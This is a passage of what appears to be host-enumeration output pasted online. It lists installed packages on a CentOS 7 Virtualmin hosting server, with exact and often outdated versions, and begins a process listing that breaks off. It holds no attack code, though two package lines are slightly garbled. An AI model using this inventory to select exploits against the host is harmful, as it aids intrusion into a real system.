  691. dmidecode-3.0-2.1.el7_3.x86_64
  692. dnsmasq-2.66-21.el7.x86_64
  693. dovecot-2.2.10-7.el7.x86_64
  694. dracut-033-463.el7_3.2.x86_64
  695. dracut-config-rescue-033-463.el7_3.2.x86_64
  696. dracut-network-033-463.el7_3.2.x86_64
  697. e2fsprogs-1.42.9-9.el7.x86_64
  698. e2fsprogs-libs-1.42.9-9.el7.x86_64
  699. ebtables-2.0.10-15.el7.x86_64
  700. elfutils-libelf-0.166-2.el7.x86_64
  701. elfutils-libs-0.166-2.el7.x86_64
  702. emacs-24.3-19.el7_3.x86_64
  703. emacs-common-24.3-19.el7_3.x86_64
  704. emacs-filesystem-24.3-19.el7_3.noarch
  705. epel-release-7-9.noarch
  706. ethtool-4.5-3.el7.x86_64
  707. expat-2.1.0-10.el7_3.x86_64
  708. file-5.11-33.el7.x86_64
  709. file-libs-5.11-33.el7.x86_64
  710. filesystem-3.2-21.el7.x86_64
  711. findutils-4.5.11-5.el7.x86_64
  712. fipscheck-1.4.1-5.el7.x86_64
  713. fipscheck-lib-1.4.1-5.el7.x86_64
  714. firewalld-0.4.3.2-8.1.el7_3.3.noarch
  715. firewalld-filesystem-0.4.3.2-8.1.el7_3.3.noarch
  716. fontconfig-2.10.95-10.el7.x86_64
  717. fontpackages-filesystem-1.44-8.el7.noarch
  718. freetype-2.4.11-12.el7.x86_64
  719. fxload-2002_04_11-16.el7.x86_64
  720. gawk-4.0.2-4.el7_3.1.x86_64
  721. gd-2.0.35-26.el7.x86_64
  722. gdbm-1.10-8.el7.x86_64
  723. gdbm-devel-1.10-8.el7.x86_64
  724. gdk-pixbuf2-2.31.6-3.el7.x86_64
  725. gettext-0.18.2.1-4.el7.x86_64
  726. gettext-libs-0.18.2.1-4.el7.x86_64
  727. ghostscript-9.07-20.el7_3.7.x86_64
  728. ghostscript-fonts-5.50-32.el7.noarch
  729. giflib-4.1.6-9.el7.x86_64
  730. glib-networking-2.42.0-1.el7.x86_64
  731. glib2-2.46.2-4.el7.x86_64
  732. glibc-2.17-157.el7_3.4.x86_64
  733. glibc-common-2.17-157.el7_3.4.x86_64
  734. glibc-devel-2.17-157.el7_3.4.x86_64
  735. glibc-headers-2.17-157.el7_3.4.x86_64
  736. gmp-6.0.0-12.el7_1.x86_64
  737. gnupg2-2.0.22-4.el7.x86_64
  738. gnutls-3.3.24-1.el7.x86_64
  739. gobject-introspection-1.42.0-1.el7.x86_64
  740. gpg-pubkey-11f63c51-3c7dc11d
  741. gpg-pubkey-352c64e5-52ae6884
  742. gpg-pubkey-8fae34bd-538f1e51
  743. gpg-pubkey-a0bdbcf9-42d1d837
  744. gpg-pubkey-f4a80eb5-53a7ff4b
  745. gpgme-1.3.2-5.el7.x86_64
  746. graphite2-1.3.6-1.el7_2.x86_64
  747. grep-2.20-2.el7.x86_64
  748. groff-base-1.22.2-8.el7.x86_64
  749. grub2-2.02-0.44.el7.centos.x86_64
  750. grub2-tools-2.02-0.44.el7.centos.x86_64
  751. grubby-8.28-21.el7_3.x86_64
  752. gsettings-desktop-schemas-3.14.2-1.el7.x86_64
  753. gtk3-3.14.13-20.el7_3.1.x86_64
  754. gzip-1.5-8.el7.x86_64
  755. hardlink-1.0-19.el7.x86_64
  756. harfbuzz-0.9.36-1.el7.x86_64
  757. hicolor-icon-theme-0.12-7.el7.noarch
  758. hostname-3.13-3.el7.x86_64
  759. httpd-2.4.6-45.el7.centos.4vm.x86_64
  760. httpd-tools-2.4.6-45.el7.centos.4vm.x86_64
  761. hwdata-0.252-8.4.el7.x86_64
  762. ilmbase-1.0.3-7.el7.x86_64
  763. info-5.1-4.el7.x86_64
  764. initscripts-9.49.37-1.el7_3.1.x86_64
  765. iproute-3.10.0-74.el7.x86_64
  766. iprutils-2.4.13.1-1.el7.x86_64
  767. ipset-6.19-6.el7.x86_64
  768. ipset-libs-6.19-6.el7.x86_64
  769. iptables-1.4.21-17.el7.x86_64
  770. iputils-20160308-8.el7.x86_64
  771. irqbalance-1.0.7-6.el7_3.1.x86_64
  772. ivtv-firmware-20080701-26.el7.noarch
  773. iwl100-firmware-39.31.5.1-49.el7.noarch
  774. iwl1000-firmware-39.31.5.1-49.el7.noarch
  775. iwl105-firmware-18.168.6.1-49.el7.noarch
  776. iwl135-firmware-18.168.6.1-49.el7.noarch
  777. iwl2000-firmware-18.168.6.1-49.el7.noarch
  778. iwl2030-firmware-18.168.6.1-49.el7.noarch
  779. iwl3160-firmware-22.0.7.0-49.el7.noarch
  780. iwl3945-firmware-15.32.2.9-49.el7.noarch
  781. iwl4965-firmware-228.61.2.24-49.el7.noarch
  782. iwl5000-firmware-8.83.5.1_1-49.el7.noarch
  783. iwl5150-firmware-8.24.2.2-49.el7.noarch
  784. iwl6000-firmware-9.221.4.1-49.el7.noarch
  785. iwl6000g2a-firmware-17.168.5.3-49.el7.noarch
  786. iwl6000g2b-firmware-17.168.5.2-49.el7.noarch
  787. iwl6050-firmware-41.28.5.1-49.el7.noarch
  788. iwl7260-firmware-22.0.7.0-49.el7.noarch
  789. jansson-2.4-6.el7.x86_64
  790. jasper-libs-1.900.1-30.el7_3.x86_64
  791. jbigkit-libs-2.0-11.el7.x86_64
  792. json-c-0.11-4.el7_0.x86_64
  793. json-glib-1.0.2-1.el7.x86_64
  794. kbd-1.15.5-12.el7.x86_64
  795. kbd-legacy-1.15.5-12.el7.noarch
  796. kbd-misc-1.15.5-12.el7.noarch
  797. kernel-3.10.0-327.28.3.el7.x86_64
  798. kernel-3.10.0-514.10.2.el7.x86_64
  799. kernel-3.10.0-514.2.2.el7.x86_64
  800. kernel-3.10.0-514.26.2.el7.x86_64
  801. kernel-3.10.0-514.6.2.el7.x86_64
  802. kernel-headers-3.10.0-514.26.2.el7.x86_64
  803. kernel-tools-3.10.0-514.26.2.el7.x86_64
  804. kernel-tools-libs-3.10.0-514.26.2.el7.x86_64
  805. kexec-tools-2.0.7-50.el7.x86_64
  806. keyutils-libs-1.5.8-3.el7.x86_64
  807. keyutils-libs-devel-1.5.8-3.el7.x86_64
  808. kmod-20-9.el7.x86_64
  809. kmod-libs-20-9.el7.x86_64
  810. kpartx-0.4.9-99.el7_3.3.x86_64
  811. krb5-devel-1.14.1-27.el7_3.x86_64
  812. krb5-libs-1.14.1-27.el7_3.x86_64
  813. lcms2-2.6-3.el7.x86_64
  814. less-458-9.el7.x86_64
  815. libICE-1.0.9-2.el7.x86_64
  816. libSM-1.2.2-2.el7.x86_64
  817. libX11-1.6.3-3.el7.x86_64
  818. libX11-common-1.6.3-3.el7.noarch
  819. libXau-1.0.8-2.1.el7.x86_64
  820. libXaw-1.0.12-5.el7.x86_64
  821. libXcomposite-0.4.4-4.1.el7.x86_64
  822. libXcursor-1.1.14-2.1.el7.x86_64
  823. libXdamage-1.1.4-4.1.el7.x86_64
  824. libXevie-1.0.3-7.1.el7.x86_64
  825. libXext-1.3.3-3.el7.x86_64
  826. libXfixes-5.0.1-2.1.el7.x86_64
  827. libXfont-1.5.1-2.el7.x86_64
  828. libXft-2.3.2-2.el7.x86_64
  829. libXi-1.7.4-2.el7.x86_64
  830. libXinerama-1.1.3-2.1.el7.x86_64
  831. libXmu-1.1.2-2.el7.x86_64
  832. libXpm-3.5.11-3.el7.x86_64
  833. libXrandr-1.4.2-2.el7.x86_64
  834. libXrender-0.9.8-2.1.el7.x86_64
  835. libXt-1.1.4-6.1.el7.x86_64
  836. libXtst-1.2.2-2.1.el7.x86_64
  837. libXxf86vm-1.1.3-2.1.el7.x86_64
  838. libacl-2.2.51-12.el7.x86_64
  839. libaio-0.3.109-13.el7.x86_64
  840. libassuan-2.1.0-3.el7.x86_64
  841. libattr-2.4.46-12.el7.x86_64
  842. libblkid-2.23.2-33.el7_3.2.x86_64
  843. libcap-2.22-8.el7.x86_64
  844. libcap-ng-0.7.5-4.el7.x86_64
  845. libcom_err-1.42.9-9.el7.x86_64
  846. libcom_err-devel-1.42.9-9.el7.x86_64
  847. libcroco-0.6.8-5.el7.x86_64
  848. libcurl-7.29.0-35.el7.centos.x86_64
  849. libdaemon-0.14-7.el7.x86_64
  850. libdb-5.3.21-19.el7.x86_64
  851. libdb-devel-5.3.21-19.el7.x86_64
  852. libdb-utils-5.3.21-19.el7.x86_64
  853. libdrm-2.4.67-3.el7.x86_64
  854. libedit-3.0-12.20121213cvs.el7.x86_64
  855. libestr-0.1.9-2.el7.x86_64
  856. libevent-2.0.21-4.el7.x86_64
  857. libffi-3.0.13-18.el7.x86_64
  858. libfontenc-1.1.2-3.el7.x86_64
  859. libgcc-4.8.5-11.el7.x86_64
  860. libgcrypt-1.5.3-13.el7_3.1.x86_64
  861. libgomp-4.8.5-11.el7.x86_64
  862. libgpg-error-1.12-3.el7.x86_64
  863. libgudev1-219-30.el7_3.9.x86_64
  864. libgusb-0.1.6-3.el7.x86_64
  865. libidn-1.28-4.el7.x86_64
  866. libjpeg-turbo-1.2.90-5.el7.x86_64
  867. libkadm5-1.14.1-27.el7_3.x86_64
  868. liblockfile-1.08-17.el7.x86_64
  869. libmemcached-1.0.16-5.el7.x86_64
  870. libmnl-1.0.3-7.el7.x86_64
  871. libmodman-2.0.1-8.el7.x86_64
  872. libmount-2.23.2-33.el7_3.2.x86_64
  873. libndp-1.2-7.el7.x86_64
  874. libnetfilter_conntrack-1.0.6-1.el7_3.x86_64
  875. libnfnetlink-1.0.1-4.el7.x86_64
  876. libnl3-3.2.28-3.el7_3.x86_64
  877. libnl3-cli-3.2.28-3.el7_3.x86_64
  878. libotf-0.9.13-4.el7.x86_64
  879. libpcap-1.5.3-8.el7.x86_64
  880. libpciaccess-0.13.4-3.el7_3.x86_64
  881. libpipeline-1.2.3-3.el7.x86_64
  882. libpng-1.5.13-7.el7_2.x86_64
  883. libproxy-0.4.11-10.el7.x86_64
  884. libpwquality-1.2.3-4.el7.x86_64
  885. librsvg2-2.39.0-1.el7.x86_64
  886. libselinux-2.5-6.el7.x86_64
  887. libselinux-devel-2.5-6.el7.x86_64
  888. libselinux-python-2.5-6.el7.x86_64
  889. libselinux-utils-2.5-6.el7.x86_64
  890. libsemanage-2.5-5.1.el7_3.x86_64
  891. libsepol-2.5-6.el7.x86_64
  892. libsepol-devel-2.5-6.el7.x86_64
  893. libsoup-2.48.1-6.el7.x86_64
  894. libss-1.42.9-9.el7.x86_64
  895. libssh2-1.4.3-10.el7_2.1.x86_64
  896. libstdc++-4.8.5-11.el7.x86_64
  897. libsysfs-2.1.0-16.el7.x86_64
  898. libtasn1-3.8-3.el7.x86_64
  899. libteam-1.25-4.el7.x86_64
  900. libthai-0.1.14-9.el7.x86_64
  901. libtiff-4.0.3-27.el7_3.x86_64
  902. libtirpc-0.2.4-0.8.el7_3.x86_64
  903. libtool-ltdl-2.4.2-22.el7_3.x86_64
  904. libunistring-0.9.3-9.el7.x86_64
  905. libusbx-1.0.20-1.el7.x86_64
  906. libuser-0.60-7.el7_1.x86_64
  907. libutempter-1.1.6-4.el7.x86_64
  908. libuuid-2.23.2-33.el7_3.2.x86_64
  909. libverto-0.2.5-4.el7.x86_64
  910. libverto-devel-0.2.5-4.el7.x86_64
  911. libwmf-lite-0.2.8.4-41.el7_1.x86_64
  912. libxcb-1.11-4.el7.x86_64
  913. libxml2-2.9.1-6.el7_2.3.x86_64
  914. libxshmfence-1.2-1.el7.x86_64
  915. libxslt-1.1.28-5.el7.x86_64
  916. libyaml-0.1.4-11.el7_0.x86_64
  917. libzip-0.10.1-8.el7.x86_64
  918. linux-firmware-20160830-49.git7534e19.el7.noarch
  919. lm_sensors-libs-3.4.0-4.20160601gitf9185e5.el7.x86_64
  920. logrotate-3.8.6-12.el7.x86_64
  921. lsscsi-0.27-4.el7.x86_64
  922. lua-5.1.4-15.el7.x86_64
  923. lvm2-2.02.166-1.el7_3.5.x86_64
  924. lvm2-libs-2.02.166-1.el7_3.5.x86_64
  925. lzo-2.06-8.el7.x86_64
  926. m17n-db-1.6.4-3.el7.noarch
  927. m17n-lib-1.6.4-14.el7.x86_64
  928. mailcap-2.1.41-2.el7.noarch
  929. mailman-2.1.15-21.el7_1.x86_64
  930. make-3.82-23.el7.x86_64
  931. man-db-2.6.3-9.el7.x86_64
  932. mariadb-5.5.52-1.el7.x86_64
  933. mariadb-devel-5.5.52-1.el7.x86_64
  934. mariadb-libs-5.5.52-1.el7.x86_64
  935. mariadb-server-5.5.52-1.el7.x86_64
  936. mesa-libEGL-11.2.2-2.20160614.el7.x86_64
  937. mesa-libGL-11.2.2-2.20160614.el7.x86_64
  938. mesa-libgbm-11.2.2-2.20160614.el7.x86_64
  939. mesa-libglapi-11.2.2-2.20160614.el7.x86_64
  940. microcode_ctl-2.1-16.3.el7_3.x86_64
  941. mlocate-0.26-6.el7.x86_64
  942. mod_dav_svn-1.7.14-10.el7.x86_64
  943. mod_fcgid-2.3.9-4.el7.x86_64
  944. mod_perl-2.0.10-2.el7.x86_64
  945. mod_ssl-2.4.6-45.el7.centos.4vm.x86_64
  946. mozjs17-17.0.0-19.el7.x86_64
  947. nano-2.3.1-10.el7.x86_64
  948. ncurses-5.9-13.20130511.el7.x86_64
  949. ncurses-base-5.9-13.20130511.el7.noarch
  950. ncurses-libs-5.9-13.20130511.el7.x86_64
  951. neon-0.30.0-3.el7.x86_64
  952. net-snmp-5.7.2-24.el7_3.2.x86_64
  953. net-snmp-agent-libs-5.7.2-24.el7_3.2.x86_64
  954. net-snmp-libs-5.7.2-24.el7_3.2.x86_64
  955. net-tools-2.0-0.17.20131004git.el7.x86_64
  956. nettle-2.7.1-8.el7.x86_64
  957. newt-0.52.15-4.el7.x86_64
  958. newt-python-0.52.15-4.el7.x86_64
  959. nmap-ncat-6.40-7.el7.x86_64
  960. nspr-4.13.1-1.0.el7_3.x86_64
  961. nss-3.28.4-1.2.el7_3.x86_64
  962. nss-softokn-3.16.2.3-14.4.el7.x86_64
  963. nss-softokn-freebl-3.16.2.3-14.4.el7.x86_64
  964. nss-sysinit-3.28.4-1.2.el7_3.x86_64
  965. nss-tools-3.28.4-1.2.el7_3.x86_64
  966. nss-util-3.28.4-1.0.el7_3.x86_64
  967. numactl-libs-2.0.9-6.el7_2.x86_64
  968. openldap-2.4.40-13.el7.x86_64
  969. openssh-6.6.1p1-35.el7_3.x86_64
  970. openssh-clients-6.6.1p1-35.el7_3.x86_64
  971. openssh-server-6.6.1p1-35.el7_3.x86_64
  972. openssl-1.0.1e-60.el7_3.1.x86_64
  973. openssl-devel-1.0.1e-60.el7_3.1.x86_64
  974. openssl-libs-1.0.1e-60.el7_3.1.x86_64
  975. os-prober-1.58-9.el7.x86_64
  976. p11-kit-0.20.7-3.el7.x86_64
  977. p11-kit-trust-0.20.7-3.el7.x86_64
  978. pakchois-0.4-10.el7.x86_64
  979. pam-1.1.8-18.el7.x86_64
  980. pango-1.36.8-2.el7.x86_64
  981. parted-3.1-28.el7.x86_64
  982. passwd-0.79-4.el7.x86_64
  983. pciutils-libs-3.5.1-1.el7.x86_64
  984. pcre-8.32-15.el7_2.1.x86_64
  985. pcre-devel-8.32-15.el7_2.1.x86_64
  986. perl-5.16.3-291.el7.x86_64
  987. perl-Archive-Tar-1.92-2.el7.noarch
  988. perl-BSD-Resource-1.29.07-1.el7.x86_64
  989. perl-Business-ISBN-2.06-2.el7.noarch
  990. perl-Business-ISBN-Data-20120719.001-2.el7.noarch
  991. perl-CGI-3.63-4.el7.noarch
  992. perl-Carp-1.26-244.el7.noarch
  993. perl-Compress-Raw-Bzip2-2.061-3.el7.x86_64
  994. perl-Compress-Raw-Zlib-2.061-4.el7.x86_64
  995. perl-Crypt-OpenSSL-Bignum-0.04-18.el7.x86_64
  996. perl-Crypt-OpenSSL-RSA-0.28-7.el7.x86_64
  997. perl-Crypt-OpenSSL-Random-0.04-21.el7.x86_64
  998. perl-Crypt-SSLeay-0.64-5.el7.x86_64
  999. perl-DBD-MySQL-4.023-5.el7.x86_64
  1000. perl-DBD-Pg-2.19.3-4.el7.x86_64
  1001. perl-DBI-1.627-4.el7.x86_64
  1002. perl-DB_File-1.830-6.el7.x86_64
  1003. perl-Data-Dumper-2.145-3.el7.x86_64
  1004. perl-Digest-1.17-245.el7.noarch
  1005. perl-Digest-HMAC-1.03-5.el7.noarch
  1006. perl-Digest-MD5-2.52-3.el7.x86_64
  1007. perl-Digest-SHA-5.85-3.el7.x86_64
  1008. perl-Encode-2.51-7.el7.x86_64
  1009. perl-Encode-Detect-1.01-13.el7.x86_64
  1010. perl-Encode-Locale-1.03-5.el7.noarch
  1011. perl-Error-0.17020-2.el7.noarch
  1012. perl-Exporter-5.68-3.el7.noarch
  1013. perl-ExtUtils-Install-1.58-291.el7.noarch
  1014. perl-ExtUtils-MakeMaker-6.68-3.el7.noarch
  1015. perl-ExtUtils-Manifest-1.61-244.el7.noarch
  1016. perl-ExtUtils-ParseXS-3.18-2.el7.noarch
  1017. perl-FCGI-0.74-8.el7.x86_64
  1018. perl-File-Listing-6.04-7.el7.noarch
  1019. perl-File-Path-2.09-2.el7.noarch
  1020. perl-File-Temp-0.23.01-3.el7.noarch
  1021. perl-Filter-1.49-3.el7.x86_64
  1022. perl-Geo-IP-1.43-3.el7.x86_64
  1023. perl-Getopt-Long-2.40-2.el7.noarch
  1024. perl-HTML-Parser-3.71-4.el7.x86_64
  1025. perl-HTML-Tagset-3.20-15.el7.noarch
  1026. perl-HTTP-Cookies-6.01-5.el7.noarch
  1027. perl-HTTP-Daemon-6.01-5.el7.noarch
  1028. perl-HTTP-Date-6.02-8.el7.noarch
  1029. perl-HTTP-Message-6.06-6.el7.noarch
  1030. perl-HTTP-Negotiate-6.01-5.el7.noarch
  1031. perl-HTTP-Tiny-0.033-3.el7.noarch
  1032. perl-IO-Compress-2.061-2.el7.noarch
  1033. perl-IO-HTML-1.00-2.el7.noarch
  1034. perl-IO-Socket-INET6-2.69-5.el7.noarch
  1035. perl-IO-Socket-IP-0.21-4.el7.noarch
  1036. perl-IO-Socket-SSL-1.94-5.el7.noarch
  1037. perl-IO-Tty-1.10-11.el7.x86_64
  1038. perl-IO-Zlib-1.10-291.el7.noarch
  1039. perl-LWP-MediaTypes-6.02-2.el7.noarch
  1040. perl-Linux-Pid-0.04-18.el7.x86_64
  1041. perl-Mail-DKIM-0.39-8.el7.noarch
  1042. perl-Mail-SPF-2.8.0-4.el7.noarch
  1043. perl-MailTools-2.12-2.el7.noarch
  1044. perl-Net-DNS-0.72-6.el7.x86_64
  1045. perl-Net-Daemon-0.48-5.el7.noarch
  1046. perl-Net-HTTP-6.06-2.el7.noarch
  1047. perl-Net-IP-1.26-4.el7.noarch
  1048. perl-Net-LibIDN-0.12-15.el7.x86_64
  1049. perl-Net-SMTP-SSL-1.01-13.el7.noarch
  1050. perl-Net-SSLeay-1.55-4.el7.x86_64
  1051. perl-NetAddr-IP-4.069-3.el7.x86_64
  1052. perl-Package-Constants-0.02-291.el7.noarch
  1053. perl-PathTools-3.40-5.el7.x86_64
  1054. perl-PlRPC-0.2020-14.el7.noarch
  1055. perl-Pod-Escapes-1.04-291.el7.noarch
  1056. perl-Pod-Perldoc-3.20-4.el7.noarch
  1057. perl-Pod-Simple-3.28-4.el7.noarch
  1058. perl-Pod-Usage-1.63-3.el7.noarch
  1059. perl-Scalar-List-Utils-1.27-248.el7.x86_64
  1060. perl-Socket-2.010-4.el7.x86_64
  1061. perl-Socket6-0.23-15.el7.x86_64
  1062. perl-Storable-2.45-3.el7.x86_64
  1063. perl-Switch-2.16-7.el7.noarch
  1064. perl-Sys-Syslog-0.33-3.el7.x86_64
  1065. perl-Test-Harness-3.28-3.el7.noarch
  1066. perl-Text-ParseWords-3.29-4.el7.noarch
  1067. perl-Time-HiRes-1.9725-3.el7.x86_64
  1068. perl-Time-Local-1.2300-2.el7.noarch
  1069. perl-TimeDate-2.30-2.el7.noarch
  1070. perl-URI-1.60-9.el7.noarch
  1071. perl-WWW-RobotRules-6.02-5.el7.noarch
  1072. perl-XML-NamespaceSupport-1.11-10.el7.noarch
  1073. perl-XML-Parser-2.41-10.el7.x86_64
  1074. perl-XML-SAX-0.99-9.el7.noarch
  1075. perl-XML-SAX-Base-1.08-7.el7.noarch
  1076. perl-XML-Simple-2.20-5.el7.noarch
  1077. perl-constant-1.27-2.el7.noarch
  1078. perl-devel-5.16.3-291.el7.x86_64
  1079. perl-libs-5.16.3-291.el7.x86_64
  1080. perl-libwww-perl-6.05-2.el7.noarch
  1081. perl-macros-5.16.3-291.el7.x86_64
  1082. perl-parent-0.225-244.el7.noarch
  1083. perl-podlators-2.5.1-3.el7.noarch
  1084. perl-threads-1.87-4.el7.x86_64
  1085. perl-threads-shared-1.43-6.el7.x86_64
  1086. perl-version-0.99.07-2.el7.x86_64
  1087. t.16-42.el7.x86_64
  1088. php-cli-5.4.16-42.el7.x86_64
  1089. php-common-5.4.16-42.el7.x86_64
  1090. php-gd-5.4.16-42.el7.x86_64
  1091. php-ldap-5.4.16-42.el7.x86_64
  1092. php-mbstring-5.4.16-42.el7.x86_64
  1093. php-mysql-5.4.16-42.el7.x86_64
  1094. php-odbc-5.4.16-42.el7.x86_64
  1095. php-pdo-5.4.16-42.el7.x86_64
  1096. php-pear-1.9.4-21.el7.noarch
  1097. php-pgsql-5.4.16-42.el7.x86_64
  1098. php-process-5.4.16-42.el7.x86_64
  1099. php-snmp-5.4.16-42.el7.x86_64
  1100. php-soap-5.4.16-42.el7.x86_64
  1101. php-xml-5.4.16-42.el7.x86_64
  1102. php-xmlrpc-5.4.16-42.el7.x86_64
  1103. pinentry-0.8.1-17.el7.x86_64
  1104. pixman-0.34.0-1.el7.x86_64
  1105. pkgconfig-0.27.1-4.el7.x86_64
  1106. plymouth-0.8.9-0.26.20140113.el7.centos.x86_64
  1107. plymouth-core-libs-0.8.9-0.26.20140113.el7.centos.x86_64
  1108. plymouth-scripts-0.8.9-0.26.20140113.el7.centos.x86_64
  1109. policycoreutils-2.5-11.el7_3.x86_64tc
  1110. polkit-0.112-12.el7_3.x86_64
  1111. polkit-pkla-compat-0.1-4.el7.x86_64
  1112. poppler-data-0.4.6-3.el7.noarch
  1113. popt-1.13-16.el7.x86_64
  1114. portreserve-0.0.5-11.el7.x86_64
  1115. postfix-2.10.1-6.el7.x86_64
  1116. postgresql-9.2.18-1.el7.x86_64
  1117. postgresql-libs-9.2.18-1.el7.x86_64
  1118. postgresql-server-9.2.18-1.el7.x86_64
  1119. ppp-2.4.5-33.el7.x86_64
  1120. procmail-3.22-35.el7.x86_64
  1121. procmail-wrapper-1.0-1.vm.x86_64
  1122. procps-ng-3.3.10-10.el7.x86_64
  1123. proftpd-1.3.5e-2.el7.x86_64
  1124. psmisc-22.20-11.el7.x86_64
  1125. pth-2.0.7-23.el7.x86_64
  1126. pygobject3-base-3.14.0-3.el7.x86_64
  1127. pygpgme-0.3-9.el7.x86_64
  1128. pyliblzma-0.5.3-11.el7.x86_64
  1129. pyparsing-1.5.6-9.el7.noarch
  1130. python-2.7.5-48.el7.x86_64
  1131. python-backports-1.0-8.el7.x86_64
  1132. python-backports-ssl_match_hostname-3.4.0.2-4.el7.noarch
  1133. python-configobj-4.7.2-7.el7.noarch
  1134. python-decorator-3.4.0-3.el7.noarch
  1135. python-dns-1.12.0-2.20150617git465785f.el7.noarch
  1136. python-firewall-0.4.3.2-8.1.el7_3.3.noarch
  1137. python-iniparse-0.4-9.el7.noarch
  1138. python-libs-2.7.5-48.el7.x86_64
  1139. python-perf-3.10.0-514.26.2.el7.x86_64
  1140. python-pycurl-7.19.0-19.el7.x86_64
  1141. python-pyudev-0.15-7.el7_2.1.noarch
  1142. python-setuptools-0.9.8-4.el7.noarch
  1143. python-slip-0.4.0-2.el7.noarch
  1144. python-slip-dbus-0.4.0-2.el7.noarch
  1145. python-urlgrabber-3.10-8.el7.noarch
  1146. pyxattr-0.5.1-5.el7.x86_64
  1147. qrencode-libs-3.4.1-3.el7.x86_64
  1148. quota-4.01-14.el7.x86_64
  1149. quota-nls-4.01-14.el7.noarch
  1150. readline-6.2-9.el7.x86_64
  1151. rest-0.7.92-5.el7.x86_64
  1152. rootfiles-8.1-11.el7.noarch
  1153. rpcbind-0.2.0-38.el7_3.1.x86_64
  1154. rpm-4.11.3-21.el7.x86_64
  1155. rpm-build-libs-4.11.3-21.el7.x86_64
  1156. rpm-libs-4.11.3-21.el7.x86_64
  1157. rpm-python-4.11.3-21.el7.x86_64
  1158. rsyslog-7.4.7-16.el7.x86_64
  1159. ruby-2.0.0.648-29.el7.x86_64
  1160. ruby-devel-2.0.0.648-29.el7.x86_64
  1161. ruby-irb-2.0.0.648-29.el7.noarch
  1162. ruby-libs-2.0.0.648-29.el7.x86_64
  1163. rubygem-bigdecimal-1.2.0-29.el7.x86_64
  1164. rubygem-io-console-0.4.2-29.el7.x86_64
  1165. rubygem-json-1.7.7-29.el7.x86_64
  1166. rubygem-psych-2.0.0-29.el7.x86_64
  1167. rubygem-rdoc-4.0.0-29.el7.noarch
  1168. rubygems-2.0.14.1-29.el7.noarch
  1169. scponly-4.8-18.el7.x86_64
  1170. sed-4.2.2-5.el7.x86_64
  1171. selinux-policy-3.13.1-102.el7_3.16.noarch
  1172. selinux-policy-targeted-3.13.1-102.el7_3.16.noarch
  1173. setup-2.8.71-7.el7.noarch
  1174. shadow-utils-4.1.5.1-24.el7.x86_64
  1175. shared-mime-info-1.1-9.el7.x86_64
  1176. slang-2.2.4-11.el7.x86_64
  1177. snappy-1.1.0-3.el7.x86_64
  1178. spamassassin-3.4.0-2.el7.x86_64
  1179. sqlite-3.7.17-8.el7.x86_64
  1180. subversion-1.7.14-10.el7.x86_64
  1181. subversion-libs-1.7.14-10.el7.x86_64
  1182. sudo-1.8.6p7-23.el7_3.x86_64
  1183. systemd-219-30.el7_3.9.x86_64
  1184. systemd-libs-219-30.el7_3.9.x86_64
  1185. systemd-sysv-219-30.el7_3.9.x86_64
  1186. systemtap-sdt-devel-3.0-7.el7.x86_64
  1187. sysvinit-tools-2.88-14.dsf.el7.x86_64
  1188. t1lib-5.1.2-14.el7.x86_64
  1189. tar-1.26-31.el7.x86_64
  1190. tcp_wrappers-7.6-77.el7.x86_64
  1191. tcp_wrappers-libs-7.6-77.el7.x86_64
  1192. teamd-1.25-4.el7.x86_64
  1193. trousers-0.3.13-1.el7.x86_64
  1194. tuned-2.7.1-3.el7_3.2.noarch
  1195. tzdata-2017b-1.el7.noarch
  1196. unixODBC-2.3.1-11.el7.x86_64
  1197. unzip-6.0-16.el7.x86_64
  1198. urw-fonts-2.4-16.el7.noarch
  1199. usermin-1.720-1.noarch
  1200. ust-virtual-server-theme-6.9-1.noarch
  1201. ustr-1.0.4-16.el7.x86_64
  1202. util-linux-2.23.2-33.el7_3.2.x86_64
  1203. vim-minimal-7.4.160-1.el7_3.1.x86_64
  1204. virt-what-1.13-8.el7.x86_64
  1205. virtualmin-base-5.0-4.rh.noarch
  1206. virtualmin-release-1.0-5.gpl.rhel.noarch
  1207. wbm-php-pear-1.6-1.noarch
  1208. wbm-ruby-gems-1.4-1.noarch
  1209. wbm-security-updates-4.5-1.noarch
  1210. wbm-virtual-server-5.99.gpl-1.noarch
  1211. wbm-virtualmin-awstats-5.1-1.noarch
  1212. wbm-virtualmin-dav-3.8-1.noarch
  1213. wbm-virtualmin-git-1.7-1.noarch
  1214. wbm-virtualmin-htpasswd-2.6-1.noarch
  1215. wbm-virtualmin-init-2.5-1.noarch
  1216. wbm-virtualmin-mailman-6.3-1.noarch
  1217. wbm-virtualmin-registrar-2.4-1.noarch
  1218. wbm-virtualmin-sqlite-1.4-1.noarch
  1219. wbm-virtualmin-svn-5.1-1.noarch
  1220. wbt-virtual-server-mobile-2.5-1.noarch
  1221. wbt-virtual-server-theme-9.3-1.noarch
  1222. webalizer-2.23_08-6.el7.x86_64
  1223. webmin-1.850-1.noarch
  1224. wget-1.14-13.el7.x86_64
  1225. which-2.20-7.el7.x86_64
  1226. wpa_supplicant-2.0-21.el7_3.x86_64
  1227. xfsprogs-4.5.0-10.el7_3.x86_64
  1228. xorg-x11-font-utils-7.5-20.el7.x86_64
  1229. xz-5.2.2-1.el7.x86_64
  1230. xz-libs-5.2.2-1.el7.x86_64
  1231. yum-3.4.3-150.el7.centos.noarch
  1232. yum-metadata-parser-1.1.4-10.el7.x86_64
  1233. yum-plugin-fastestmirror-1.1.31-40.el7.noarch
  1234. zip-3.0-11.el7.x86_64
  1235. zlib-1.2.7-17.el7.x86_64
  1236. zlib-devel-1.2.7-17.el7.x86_64
  1237.  
  1238. [+] Current processes
  1239. USER PID START TIME COMMAND
  1240. root 1 Apr01 150:20 /usr/lib/systemd/systemd
  1241. root 2 Apr01 0:11 [kthreadd]
  1242. root 3 Apr01 3:09 [ksoftirqd/0]
  1243. root 7 Apr01 2:17 [migration/0]
  1244. root 8 Apr01 0:00 [rcu_bh]
  1245. root 9 Apr01 250:48 [rcu_sched]
  1246. root 10 Apr01 2:25 [watchdog/0]
  1247. root 11 Apr01 2:22 [watchdog/1]
  1248. root 12 Apr01 2:24 [migration/1]
  1249. root 13 Apr01 10:43 [ksoftirqd/1]
  1250. root 15 Apr01 0:00 [kworker/1:0H]
  1251. root 16 Apr01 2:39 [watchdog/2]
  1252. root 17 Apr01 2:17 [migration/2]
  1253. root 18 Apr01 2:20 [ksoftirqd/2]
  1254. root 20 Apr01 0:00 [kworker/2:0H]
  1255. root 21 Apr01 2:13 [watchdog/3]
  1256. root 22 Apr01 3:06 [migration/3]
  1257. root 23 Apr01 6:25 [ksoftirqd/3]
  1258. root 27 Apr01 0:00 [kdevtmpfs]
  1259. root 28 Apr01 0:00 [netns]
  1260. root 29 Apr01 0:11 [khungtaskd]
